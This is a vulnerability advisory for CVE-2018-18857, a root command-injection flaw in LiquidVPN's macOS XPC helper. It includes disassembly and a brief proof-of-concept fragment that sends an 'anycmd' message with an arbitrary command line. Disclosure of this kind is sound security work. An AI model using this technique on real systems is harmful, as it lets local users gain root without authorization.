ASA-2018-00026 – LiquidVPN: “anycmd” Privilege Escalation

Posted on by Allele Security Intelligence in Alerts

Allele Security Alert

ASA-2018-00026

Identifier(s)

ASA-2018-00026, CVE-2018-18857

Title

“anycmd” Privilege Escalation

Vendor(s)

LiquidVPN

Product(s)

LiquidVPN for macOS

Affected version(s)

LiquidVPN 1.37, 1.36 and earlier

Fixed version(s)

Unknown

Proof of concept

Unknown

Description

LiquidVPN installs the helper tool “com.smr.liquidvpn.OVPNHelper” for performing privileged (root) actions. In order to allow other LiquidVPN components to send messages to the helper tool, it implements an XPC service. Static code analysis showed, that the XPC service does not filter incoming messages. This means, regular users (local attackers) can craft arbitrary XPC messages and send them to the service.

Technical details

After receiving a message, the service checks for the existence of the “anycmd” parameter:

---
...
__text:00000001000012E8 lea rsi, aAnycmd ; "anycmd"
__text:00000001000012EF mov rdi, r14 ; char *
__text:00000001000012F2 call _strcmp
__text:00000001000012F7 test eax, eax
__text:00000001000012F9 jnz loc_1000016C2
__text:00000001000012FF mov [rbp+var_10A38], r15
__text:0000000100001306 lea rsi, aCommandLine ; "command_line"
__text:000000010000130D mov rdi, rbx
...
__text:0000000100001336 lea rsi, aR ; "r"
__text:000000010000133D mov rdi, r14 ; char *
__text:0000000100001340 call _popen
...
---

If “anycmd” is found, the “command_line” parameter is extracted from the message and directly passed on to a call to popen() as an argument.

The following proof of concept can be used to execute arbitrary system commands:

---
...
xpc_dictionary_set_string(message, "cmd", "anycmd");
xpc_dictionary_set_bool(message, "blocking", FALSE);
xpc_dictionary_set_string(message, "command_line", "[ARBITRARY CMD]");
...
---

Credits

Bernd Leitner

Reference(s)

Multiple Privilege Escalation Vulnerabilities in LiquidVPN for MacOS (CVE-2018-18856, CVE-2018-18857, CVE-2018-18858, CVE-2018-18859)
https://seclists.org/fulldisclosure/2018/Nov/1

CVE-2018-18857
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18857

CVE-2018-18857
https://nvd.nist.gov/vuln/detail/CVE-2018-18857

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: February 1, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.